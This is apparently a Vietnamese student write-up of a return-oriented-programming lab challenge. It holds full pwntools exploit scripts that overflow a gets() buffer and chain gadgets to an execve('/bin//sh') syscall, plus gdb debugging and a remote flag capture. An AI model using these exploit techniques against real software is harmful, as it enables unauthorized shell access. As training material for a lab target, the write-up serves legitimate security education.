## Bài tập về nhà

## • B. ROPBasic

Đã làm trên lớp.

## • C. ROP2

## Chiếm shell (/bin/sh) thông qua rop2

Kiểm tra file rop2:

Ta thấy được flag NX (Non Executable) có giá trị là Enabled nghĩa là code ta chèn vào stack sẽ không được thực thi

⇒ Phải tấn công dạng return-oriented programming

Xem mã giả bằng IDA Pro

```
int __cdecl main(int argc, const char **argv, const char **envp
{
  int v3; // ST1C_4

  setvbuf(stdout, 0, 2, 0);
  v3 = getegid();
  setresgid(v3, v3, v3);
  vuln();
  return 0;
}

BYTE *vuln()
{
  char v1; // [esp+0h] [ebp-18h]

  puts("Can you ROP your way out of this one?");
  return gets(&v1);
}
```

Ta thấy được chương trình dùng hàm gets trong vuln()

Ý tưởng: tấn công buffer overflow, padding hàm gets đến hàm return của vuln(), ghi đè địa chỉ một chuỗi gadget vào stack để điều hướng chương trình như mong muốn

Tìm kiếm các chỗi gadget cần thiết để sử dụng:

Để gọi systemcall ta cần chỉnh giá trị của eax, ebx, ecx, edx (eax = 11, ebx chứa địa chỉ của chuỗi "/bin/sh", ecx = edx = 0) và cần hàm interrupt (int 0x80)

pop eax; ret

```
(kali@kali)-[~/Desktop]
$ ROPgadget --binary rop2 --only 'pop ret' | grep eax
0×0809f46a : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0×08056334 : pop eax ; pop edx ; pop ebx ; ret
0×080a8e36 : pop eax ; ret
0×0805c524 : pop eax ; ret 0×fffe
0×0809f469 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
```

pop edx; pop ecx; pop ebx; ret

```
(kali@ kali)-[~/Desktop]
$ ROPgadget --binary rop2 --only 'pop|ret' | grep edx | grep ecx | grep ebx
0×0806ee91 : pop edx ; pop ecx ; pop ebx ; ret
```

int 0x80

```
(kali⊗ kali)-[~/Desktop]
$ ROPgadget — binary rop2 — only 'int'
Gadgets information

0×08049563 : int 0×80
Unique gadgets found: 1
```

Chuỗi "/bin/sh" (Không có sẵn)

Chỉnh sửa code python đơn giản được cung cấp sẵn ở bài ROPBasic và thay các giá trị mới vào ta được đoan code sau:

```
from pwn import *
#p = process(['/usr/bin/nc', '45.122.249.68', '10007'])
p = process('./rop2')
# pop eax ; ret
pop_eax_ret = 0 \times 080bb196
# pop edx ; pop ecx ; pop ebx ; ret
pop_edx_ecx_ebx_ret = 0×0806eb90
# systemcall
int_0 \times 80 = 0 \times 08049421
# address of binsh
#binsh not found
# padding
payload = b'A'
payload += p32(pop_eax_ret)
payload += p32(0 \times b)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0)
payload += p32(0)
payload += p32(binsh)
payload += p32(int_0 \times 80)
# send payload to process
p.sendline(payload)
# interact with process
p.interactive()
```

Tim padding: (gdb rop2)

Xem code hàm vuln() (do gets() nằm trong vuln() đã biết khi xem mã giả bằng IDA)

```
db-peda$ disassemble vuln
Dump of assembler code for function vuln:
   0×080488a5 <+0>:
                        push
                               ebp
   0×080488a6 <+1>:
                        moν
                               ebp,esp
  0×080488a8 <+3>:
                        push
                               ebx
  0×080488a9 <+4>:
                        sub
                               esp,0×14
  0×080488ac <+7>:
                        call
                               0×8048780 <__x86.get_pc_thunk.bx>
                               ebx,0×9174f
   0×080488b1 <+12>:
                        add
  0×080488b7 <+18>:
                        sub
                               esp,0×c
  0×080488ba <+21>:
                        lea
                               eax,[ebx-0×2dc38]
  0×080488c0 <+27>:
                        push
                               eax
  0×080488c1 <+28>:
                               0×80502b0 <puts>
                        call
  0×080488c6 <+33>:
                        add
                               esp,0×10
  0×080488c9 <+36>:
                        sub
                               esp,0×c
   0×080488cc <+39>:
                        lea
                               eax,[ebp-0×18]
  0×080488cf <+42>:
                        push
                               eax
   0×080488d0 <+43>:
                        call
                               0×8050120 <gets>
                               esp,0×10
   0×080488d5 <+48>:
                        add
                               ebx, DWORD PTR [ebp-0×4]
   0×080488d8 <+51>:
                        mov
  0×080488db <+54>:
                        leave
   0×080488dc <+55>:
                        ret
End of assembler dump.
      da$ b*0×080488d0
Breakpoint 1 at 0×80488d0
```

Đặt breakpoint ở hàm gets và bắt đầu chạy

Tiếp tục chọn next (n), chương trình yêu cầu cung cấp input

```
⇒ 0×80488d0 <vuln+43>: call
                                        0×8050120 <gets>
    0×80488d5 <vuln+48>: add
                                        esp,0×10
    0×80488d8 <vuln+51>: mov
                                        ebx,DWORD PTR [ebp-0×4]
    0×80488db <vuln+54>: leave
    0×80488dc <vuln+55>: ret
Guessed arguments:
arg[0]: 0 \times ffffd1a0 \rightarrow 0 \times 80da000 \rightarrow 0 \times 0
0000
        0 \times ffffd190 \longrightarrow 0 \times fffffd1a0 \longrightarrow 0 \times 80da000 \longrightarrow 0 \times 0
        0×ffffd194 → 0×80db324 → 0×ffffffff
0004
       0×ffffd198 → 0×805045b (<setvbuf+11>:
0×fffffd19c → 0×80488b1 (<vuln+12>:
0008
                                                               add
                                                                        edi,0×89ba5)
0012
                                                                        ebx,0×9174f)
                                                               add
0016
       0 \times ffffd1a0 \longrightarrow 0 \times 80da000 \longrightarrow 0 \times 0
0020
      0 \times ffffd1a4 \rightarrow 0 \times 806c5d6 (<setresgid+6>:
                                                                        ebx,0×6da2a)
                                                               add
0024
      0×ffffd1a8 → 0×80da000 → 0×0
0028 0×ffffd1ac \rightarrow 0×804892a (<main+77>:
                                                               add
                                                                        esp,0×10)
Legend: code, data, rodata, value
Breakpoint 1, 0×080488d0 in vuln ()
           n
AAAAAA
```

Sau khi nhập input, ta thấy input xuất hiện tại địa chỉ 0xffffd160 như hình dưới:

```
0×80488cc <vuln+39>: lea
                                 eax,[ebp-0×18]
   0×80488cf <vuln+42>: push
                                 eax
   0×80488d0 <vuln+43>:
                                 esp,0×10
⇒ 0×80488d5 <vuln+48>: add
   0×80488d8 <vuln+51>: mov
                                 ebx,DWORD PTR [ebp-0×4]
   0×80488db <vuln+54>: leave
   0×80488dc <vuln+55>:
   0×80488dd <main>:
                                 ecx,[esp+0×4]
                         lea
      0×ffffd150 -> 0×ffffd160 ("AAAAAA")
0000 l
0004
      0×ffffd154 → 0×80db324 → 0×ffffffff
      0×ffffd158 → 0×805045b (<setvbuf+11>:
0×ffffd15c → 0×80488b1 (<vuln+12>:
0008
                                                           edi,0×89ba5)
                                                   add
0012
                                                   add
                                                           ebx,0×9174f)
      0×ffffd160 ("AAAAAA")
0016
0020
      0×ffffd164 → 0×8004141
      0×ffffd168 → 0×80da000 -
0024
0028 0×ffffd16c \rightarrow 0×804892a (<main+77>:
                                                   add
                                                           esp,0×10)
Legend: code, data, rodata, value
×080488d5 in vuln ()
```

Đây chính là địa chỉ lưu input của ta

Nhấn next tiếp tục đến khi con trỏ chương trình trỏ tới ret

```
0×80488d5 <vuln+48>: add
                                    esp,0×10
                                    ebx, DWORD PTR [ebp-0×4]
   0×80488d8 <vuln+51>: mov
   0×80488db <vuln+54>: leave
⇒ 0×80488dc <vuln+55>: ret
   0×80488dd <main>:
                            lea
                                    ecx,[esp+0×4]
   0×80488e1 <main+4>:
                                    esp,0×fffffff0
                            and
                                    DWORD PTR [ecx-0×4]
   0×80488e4 <main+7>:
                            push
   0×80488e7 <main+10>: push
0000
                      → 0×8048932 (<main+85>:
                                                         mov
                                                                 eax,0×0)
0004
                      → 0×1
0008
                        0×804f02b (<__internal_atexit+11>: add
                                                                           eax,0×8afd5)
                         0×80da000 → 0×0
0012
0016
       0×ffffd18c → 0×3e8
0020
       0 \times ffffd190 \rightarrow 0 \times ffffd1b0 \rightarrow 0 \times 1
0024
       0 \times ffffd194 \longrightarrow 0 \times 80da000 \longrightarrow 0 \times 0
0028 0 \times ffffd198 \longrightarrow 0 \times 0
Legend: code, data, rodata, value
Breakpoint 1, 0×080488dc in vuln ()
```

Khi chạy ret, chương trình sẽ pop ra địa chỉ tại đỉnh stack và thực hiện lệnh tương ứng địa chỉ này

Do đó đỉnh stack lúc này chính là nơi ta sẽ ghi đè địa chỉ của gadget đầu tiên vào

Trừ 2 địa chỉ đã tìm thấy

```
gdb-peda$ p/x 0×ffffd17c - 0×ffffd160
$1 = 0×1c
gdb-peda$
```

0x1c = 28 (đơn vị) (x32 => 28 bytes)

⇒ Vậy tìm được padding là 28

Như vậy ta vẫn còn thiếu chuỗi "/bin/sh"

pop edx; ret

```
-(kali⊕kali)-[~/Desktop]
S ROPgadget -- binary rop2 -- only 'pop ret' | grep edx
0×08056334 : pop eax ; pop edx ; pop ebx ; ret
0×0806ee6a:
                       pop edx
             pop ebx
                               ; ret
0×08056335 :
             pop edx
                       pop ebx ; ret
0×0806ee91 :
             pop
                       pop
                           ecx; pop ebx; ret
0×0806ee6b
             pop
                       ret
0×0806ee69 :
             pop esi
                       pop ebx ; pop edx ; ret
```

xor eax, eax; ret (trả eax về 0)

```
(kali⊕ kali)-[~/Desktop]
$ ROPgadget --binary rop2 --only 'xor|ret' | grep eax
0×08080b50 : xor byte ptr [eax - 0×7bf0dbc6], al ; ret
0×0806f32e : xor dword ptr [eax], edi ; ret 0×2d75
0×080a6d47 : xor eax, 0×81fffa1a ; ret
0×0807aa47 : xor eax, 0×81fffcdd ; ret
0×08053047 : xor eax, 0×81ffff57 ; ret
0×08056420 : xor eax, eax ; ret
```

mov dword ptr [edx], eax; ret (đưa giá trị eax vào ô nhớ có địa chỉ edx trỏ tới)

```
(kali@ kali)-[~/Desktop]
$ ROPgadget --binary rop2 | grep "mov dword ptr \[edx\], eax ; ret"
0x08056e5e : add byte ptr [eax], al ; lea edx, [eax + 0x30] ; mov eax, dword ptr [ecx] ; mov dword ptr [edx], eax ; ret
0x08056e5f : add byte ptr [ebp + 0x18b3050], cl ; mov dword ptr [edx], eax ; ret
0x08056e60 : lea edx, [eax + 0x30] ; mov eax, dword ptr [ecx] ; mov dword ptr [edx], eax ; ret
0x08056e65 : mov dword ptr [edx], eax ; ret
0x08056e63 : mov eax, dword ptr [ecx] ; mov dword ptr [edx], eax ; ret
```

Ý tưởng: trỏ edx đến ô nhớ muốn lưu chuỗi "/bin/sh" -> lưu một phần của chuỗi này vào eax -> đưa giá trị eax vào ô nhớ có địa chỉ chứa trong edx -> dịch edx tới vị trí tiếp theo và tiếp tục đến hết chuỗi.

Ta sẽ lưu chuỗi này vào section data tại địa chỉ bên dưới (do data có flag W)

```
(kali⊛kali)-[~/Desktop]
-$ readelf -S rop2 | grep data
[10] .rodata
                        PROGBITS
                                         080ac3c0 0643c0 0186d8 00
                                                                              0 32
[13] .tdata
                        PROGBITS
                                         080d86e0 08f6e0 000010 00 WAT
                                                                          Ø
                                                                              0 4
                        PROGBITS
                                         080d8700 08f700 0018d4 00
                                                                          Ø
                                                                              0 32
[17] .data.rel.ro
                                                                      WΑ
[20] .data
                        PROGBITS
                                         080da060
                                                  091060 000f20 00
                                                                      WA
                                                                              0 32
```

Như vậy ta được code sau (ex.py):

```
from pwn import *
#p = process(['/usr/bin/nc', '45.122.249.68', '10007'])
p = process('./rop2')
# pop eax ; ret
pop_eax_ret = 0 \times 080a8e36
# pop edx ; pop ecx ; pop ebx ; ret
pop_edx_ecx_ebx_ret = 0×0806ee91
# systemcall
int_0 \times 80 = 0 \times 08049563
# pop edx ; ret
pop_edx_ret = 0×0806ee6b
# xor eax, eax; ret
xor eax ret = 0 \times 08056420
# mov dword ptr [edx], eax ; ret
mov_eax_mem_edx_ret = 0 \times 08056e65
# address of binsh (data section)
binsh = 0×080da060
# padding
payload = b'A'*28
# add "/bin" into data section
# point edx to the start of data section
payload += p32(pop_edx_ret); payload += p32(binsh)
# put "/bin" in eax (e*x registers can contain 4 bytes)
payload += p32(pop_eax_ret); payload += b"/bin"
# move eax value to the memory where edx point (start of .bss section)
payload += p32(mov_eax_mem_edx_ret)
# point edx to next 4 bytes in order to insert "/sh" string
payload += p32(pop_edx_ret); payload += p32(binsh + 4)
# insert "//sh" into eax (4 bytes, shell accepts /bin//sh)
payload += p32(pop_eax_ret); payload += b'//sh'
# insert "//sh" into memory after string "/bin"
payload += p32(mov_eax_mem_edx_ret)
# point edx to next 4 byte (to insert null terminated after string "/bin//sh")
```

```
# point edx to next 4 byte (to insert null terminated after string "/bin//sh")
payload += p32(pop_edx_ret); payload += p32(binsh + 8)
# xor eax eax to make eax = 0 (null)
payload += p32(xor_eax_ret)
# move null byte to after "/bin/sh "
payload += p32(mov_eax_mem_edx_ret)
payload += p32(pop_eax_ret)
payload += p32(0 \times b)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0)
payload += p32(0)
payload += p32(binsh)
payload += p32(int_0 \times 80)
# send payload to process
p.sendline(payload)
# interact with process
p.interactive()
#print(payload)
```

Chạy thử bị lỗi

```
kali@ kali)-[~/Desktop]
$ python ex.py
[+] Starting local process './rop2': pid 10105
[*] Switching to interactive mode
Can you ROP your way out of this one?
[*] Process './rop2' stopped with exit code -11 (SIGSEGV) (pid 10105)
[*] Got EOF while reading in interactive
$
```

Bắt đầu debug

Sửa lại code, code chỉ in ra payload không tạo ra cũng như interact with new process. Dùng payload này debug bằng gdb

```
# send payload to process
#p.sendline(payload)
# interact with process
#p.interactive()
#p.interactive()
print(payload)
```

Mở gdb rop2, đặt breackpoint tại hàm ret của vuln() rồi chạy lệnh sau

```
gdb-peda$ r < <(python ex.py)</pre>
```

Dùng lệnh dưới để xem 30 mục trong stack tính từ địa chỉ 0xffffd1ac (đây chính là địa chỉ sau phần padding, xem lại phần tìm padding)

```
$ x/30x 0×ffffd17c
       0×0806ee6b
                        0×080da060
                                         0×08008e36
                                                           0×080da000
                         0×ffffd1b0
       0×000003e8
                                          0×080da000
                                                           0×00000000
       0×08048f6f
                        0×0806f0af
                                          0×080da000
                                                           0×080da000
       0×08048f6f
                        0×00000001
                                         0×ffffd264
                                                           0×ffffd26c
       0×ffffd204
                         0×00000000
                                         0×00000000
                                                           0×00000000
       0×080da000
                        0×00000000
                                         0×00000000
                                                           0×00000000
       0×00000006
                         0×0000008e
                                          0×00000080
                                                           0×00000000a
       0×00000000
                         0×00000000
```

Ta thấy các lệnh sau

0x0806ee6b pop edx; ret (với 0x080da060 là giá trị được pop ra từ stack)

0x080da060

0x08008e36 Không tìm thấy giá trị này trong payload, ta không hề chèn giá trị này vào payload. Xem kĩ lại payload thấy được 0x080a8e36 là gadget pop eax ; ret

- Như vậy trong quá trình truyền dữ liệu đã xảy ra lỗi làm sai lệch dữ liệu
- Dự đoán: 0x0a chính là kí tự "\n" nhưng khi được chèn vào trong process, có thể process nhận ký tự này thành null (giá trị 0x00)

Tiếp tục nhấn next (n)

```
IP: 0×8008e36
FLAGS: 0×10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
       0 \times ffffd188 \longrightarrow 0 \times 80da000 \longrightarrow 0 \times 0
0000
0004
                        → 0×3e8
0008
                     \rightarrow 0×ffffd1b0 \rightarrow 0×1
                     → 0×80da000 → 0×0
0012
0016
                        → 0×0
                                       (<__libc_start_main+943>:
0020
                                                                                 add
                                                                                          esp,0×10)
0024
                                       (<_dl_debug_initialize+15>:
                                                                                          ecx,0×6af51)
                                                                                 add
0028
       0 \times ffffd1a4 \longrightarrow 0 \times 80da000 \longrightarrow 0 \times 0
Legend: code, data, rodata, value
Stopped reason:
   8008e36 in ?
       da$ sSsS
```

Địa chỉ 0x8008e36 có giá trị 0 => ngắt chương trình

Vậy để khắc phục, ta tránh dùng các địa chỉ gadget có chứa byte 0x0a

Kiểm tra lại payload, ta thấy pop\_eax\_ret là gadget duy nhất chứa byte 0x0a

```
# pop eax ; ret
pop_eax_ret = 0×080a8e36
# pop edx ; pop ecx ; pop ebx ; ret
pop_edx_ecx_ebx_ret = 0×0806ee91
# systemcall
int_0×80 = 0×08049563
# pop edx ; ret
pop_edx_ret = 0×0806ee6b
# xor eax, eax ; ret
xor_eax_ret = 0×08056420
# mov dword ptr [edx], eax ; ret
mov_eax_mem_edx_ret = 0×08056e65
# address of binsh (data section)
binsh = 0×080da060
```

Tìm một gadget khác thay thế:

```
(kali@ kali)-[~/Desktop]
$ ROPgadget --binary rop2 --only 'pop|ret' | grep eax
0×0809f46a : pop eax ; pop ebx ; pop edi ; ret
0×08056334 : pop eax ; pop edx ; pop ebx ; ret
0×080a8e36 : pop eax ; ret
0×0805c524 : pop eax ; ret 0×fffe
0×0809f469 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
```

Đây là gadget phù hợp nhất

Như vậy code cần được sửa lại như sau (ex-rop2.py):

```
from pwn import *
#p = process(['/usr/bin/nc', '45.122.249.68', '10006'])
p = process('./rop2')
# pop eax ; pop edx ; pop ebx ret
pop_eax_edx_ebx_ret = 0 \times 08056334
# pop edx ; pop ecx ; pop ebx ; ret
pop edx ecx ebx ret = 0×0806ee91
# systemcall
int 0 \times 80 = 0 \times 08049563
# pop edx ; ret
pop_edx_ret = 0×0806ee6b
# xor eax, eax ; ret
xor_eax_ret = 0 \times 08056420
# mov dword ptr [edx], eax ; ret
mov_eax_mem_edx_ret = 0 \times 08056e65
# address of binsh (data section)
binsh = 0 \times 080 da 060
# padding
payload = b'A'*28
# add "/bin" into data section
# put "/bin" in eax (e*x registers can contain 4 bytes)
payload += p32(pop_eax_edx_ebx_ret); payload += b"/bin"
# point edx to the start of data section and dump value for ebx
payload += p32(binsh); payload += p32(0)
# move eax value to the memory where edx point (start of .bss section)
payload += p32(mov_eax_mem_edx_ret)
# insert "//sh" into eax (4 bytes, shell accepts /bin//sh)
payload += p32(pop_eax_edx_ebx_ret); payload += b'//sh'
# point edx to next 4 bytes in order to insert "/sh" string
payload += p32(binsh + 4); payload += p32(0)
# insert "//sh" into memory after string "/bin"
payload += p32(mov_eax_mem_edx_ret)
# point edx to next 4 byte (to insert null terminated after string "/bin//sh")
```

```
# point edx to next 4 byte (to insert null terminated after string "/bin//sh")
payload += p32(pop_edx_ret); payload += p32(binsh + 8)
# xor eax eax to make eax = 0 (null)
payload += p32(xor_eax_ret)
# move null byte to after "/bin/sh "
payload += p32(mov_eax_mem_edx_ret)
payload += p32(pop_eax_edx_ebx_ret)
payload += p32(0 \times b); payload += p64(0)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0)
payload += p32(0)
payload += p32(binsh)
payload += p32(int_0 \times 80)
# send payload to process
p.sendline(payload)
# interact with process
p.interactive()
#print(payload)
```

Chạy lại chương trình:

```
-(kali®kali)-[~/Desktop]
_$ whoami
kali
 —(kali@kali)-[~/Desktop]
sudo python ex-rop2.py
[sudo] password for kali:
[+] Starting local process './rop2': pid 1687
[*] Switching to interactive mode
Can you ROP your way out of this one?
$ whoami
root
$ ls
                                      peda-session-rop2.txt rop2
core
          ex-rop2.py ex2-rop.py
                      ex2-rop.pv.bak
ex-rop.py ex.py
```

Thành công chiếm được shell

Tìm flag tại 45.122.249.68:10006 (Nhóm 2)

Sửa file ex-rop2.py lại như sau:

```
p = process(['/usr/bin/nc', '45.122.249.68', '10006'])
#p = process('./rop2')
```

Chạy file ex-rop2.py

Ta tìm được flag là flag{73022499164268983362}